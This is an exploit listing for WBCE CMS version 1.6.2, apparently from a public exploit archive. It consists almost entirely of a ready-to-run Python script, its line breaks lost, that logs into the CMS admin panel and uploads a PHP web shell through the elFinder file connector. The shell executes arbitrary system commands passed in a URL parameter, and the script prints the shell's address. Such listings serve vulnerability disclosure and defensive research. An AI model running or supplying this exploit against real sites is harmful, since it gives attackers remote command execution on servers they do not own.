Headline
WBCE CMS 1.6.2 Remote Code Execution
WBCE CME version 1.6.2 suffers from a remote code execution vulnerability.
# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)# Date: 3/5/2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://wbce-cms.org/# Software Link:https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip# Version: 1.6.2# Tested on: MacOSimport requestsfrom bs4 import BeautifulSoupimport sysimport timedef login(url, username, password):print("Logging in...")time.sleep(3)with requests.Session() as session:response = session.get(url + "/admin/login/index.php")soup = BeautifulSoup(response.text, 'html.parser')form = soup.find('form', attrs={'name': 'login'})form_data = {input_tag['name']: input_tag.get('value', '') for input_tag inform.find_all('input') if input_tag.get('type') != 'submit'}# Kullanıcı adı ve şifre alanlarını dinamik olarak güncelleform_data[soup.find('input', {'name': 'username_fieldname'})['value']] =usernameform_data[soup.find('input', {'name': 'password_fieldname'})['value']] =passwordpost_response = session.post(url + "/admin/login/index.php", data=form_data)if "Administration" in post_response.text:print("Login successful!")time.sleep(3)return sessionelse:print("Login failed.")print("Headers received:", post_response.headers)print("Response content:", post_response.text[:500]) # İlk 500 karakterreturn Nonedef upload_file(session, url):# Dosya içeriğini ve adını belirleyinprint("Shell preparing...")time.sleep(3)files = {'upload[]': ('shell.inc',"""<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?phpif(isset($_GET['cmd'])){system($_GET['cmd']);}?></pre></body></html>""", 'application/octet-stream')}data = {'reqid': '18f3a5c13d42c5','cmd': 'upload','target': 'l1_Lw','mtime[]': '1714669495'}response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",files=files, data=data)if response.status_code == 200:print("Your Shell is Ready: " + url + "/media/shell.inc")else:print("Failed to upload file.")print(response.text)if __name__ == "__main__":url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = login(url, username, password)if session:upload_file(session, url)